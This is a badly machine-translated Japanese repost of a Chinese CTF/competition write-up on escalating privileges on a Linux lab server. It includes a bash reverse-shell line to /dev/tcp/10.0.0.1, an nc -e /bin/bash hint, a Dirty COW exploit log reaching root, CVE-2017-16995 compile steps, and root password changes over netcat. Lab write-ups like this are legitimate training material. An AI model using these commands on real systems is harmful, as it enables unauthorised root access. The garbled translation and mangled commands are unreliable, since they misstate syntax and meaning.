タスク1:Linuxカーネルは、右に言及(50点)[2019年情報セキュリティ管理と評価コンテストの問題に答える-01]

タスキング環境の説明:

攻撃:

物理マシン:のWindows7

物理的なインストールツール1:マイクロソフトのVisual Studio 2008

物理的なインストールツール2:OllyICE

仮想マシン1:Ubuntu_Linux

仮想マシン1インストールツール1:のpython3 / Python2

1つの仮想マシンのインストールツール2:GCC

1つの仮想マシンのインストールツール3:GDB

1つの仮想マシンのインストールツール4:Netcatを

1台の仮想マシンのユーザー名:ルート、パスワード仮想マシン1:123456

仮想マシンのオペレーティングシステム2:CentOS_Linux

2仮想マシンのインストールツール1:GCC

2つの仮想マシンのインストールツール2:GDB

仮想マシン2ユーザー名:ルート、VM 2パスワード:123456

ドローン:

サーバーシナリオ1:WindowsServer

FTPサーバーシナリオ1件のダウンロードサービスのユーザー名:匿名

サーバーシナリオ2:LinuxServer_01


概要:

シーンにログイン現在のシステムに関連する関連情報を用いて印刷(カーネルバージョン番号、ハードウェアアーキテクチャ、ホスト名、およびオペレーティング・システム・タイプは、ファイルを表示しないコマンド)、2ウェブシェルは、動作指令FLAG値として送信されます。

答え:のuname -a

bashの-i>&/dev/tcp/10.0.0.1/8080 0>:#取得ウェブシェルトピックは、あなたすることはできません直接リバウンドbashのコマンドを使用して、直接NC NC -e / binに/ bashのがあれば、立ち直るする必要があります&1

2.エコーカーネルバージョンは、フラグ操作コマンドなどの情報の値に応じて送信されます。

運転指令:のuname -r

ファイルサーバのシナリオをアップロードする権利、プロンプトの言葉はすべてFLAG値として提出成功に言及し、関連する2により3。

明確な言及は正しい方法ではない何か、それは答えることができません。

疑わ:汚い牛、CVE-2017から16995 ....

汚い牛:

www-data@medidor2:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread
www-data@medidor2:/tmp$ ls
hello
www-data@medidor2:/tmp$ chmod +x hello
www-data@medidor2:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@medidor2:/tmp$ ./hello [*] range: b7573000-b7716000] [*] getuid = b762bd10 [*] mmap 0xb73cb000 [*] exploiting (patch) [*] patched (madviseThread) [*] patched (procselfmemThread) root@medidor2:/tmp# [*] exploiting (unpatch) [*] unpatched: uid=33 (madviseThread) [*] unpatched: uid=33 (procselfmemThread) root@medidor2:/tmp# id uid=0(root) gid=0(root) groups=0(root)

CVE-2017から16995の直接コンパイラはgcc -o EXP exp.cことができます。

汚い牛:汚い牛を使用して、実行するようにコンパイルはgcc -pthread dirty.c -o汚い-lcryptは、バックアップ用の/ etcに/ passwdのことに留意すべきである、そして/ etc / passwdファイルの書き換えは、アカウントの権限を変更します。

モードNC、出力相互情報やエラー情報をリスニングし、ポート8081をリッスンし、仮想マシンの攻撃で4、FLAG指令値として提出しました。

コマンド:NC -lvvp 8081

関連した手段を介して接続された攻撃のシナリオサーバ2 NC、第4ワード提出FLAG値と有意に三行後の陽性結果の成功リターンから仮想マシン1。

コマンド:netcatをIPポート

関連手段を通じてNC接続に成功2、サーバ仮想マシン1シーンへの攻撃機後6は、rootのパスワードを変更するには、関連するコマンドによって、それは彼のパーティーの後に提出したFLAG値として最後の三つの言葉で応答します。

コマンド:LinuxはNC経由でパスワードを変更するためのコマンド:qqadminsshエコー| passwdを--stdinルート

7.あなたがあなたのパスワードを変更すると、バックFLAG値として提出最後の二つの重要な単語の最後の行に、/root/flag.txtファイルを表示します。

コマンド:猫/root/flag.txt

8.現在のユーザーは、右、ティムを成功させる権利を言及/root/flag.txt再び見て、エコーコンテンツの後に提出したFLAG値として二つの言葉。

コマンド:猫/root/flag.txt 

 

あなたはあなたに有益な記事を見つけた場合は、下記のQRコードをスキャンすることで報酬することができます。

- >マイクロ手紙<             - - >アリペイ< -

 

おすすめ

転載: www.cnblogs.com/nul1/p/11122376.html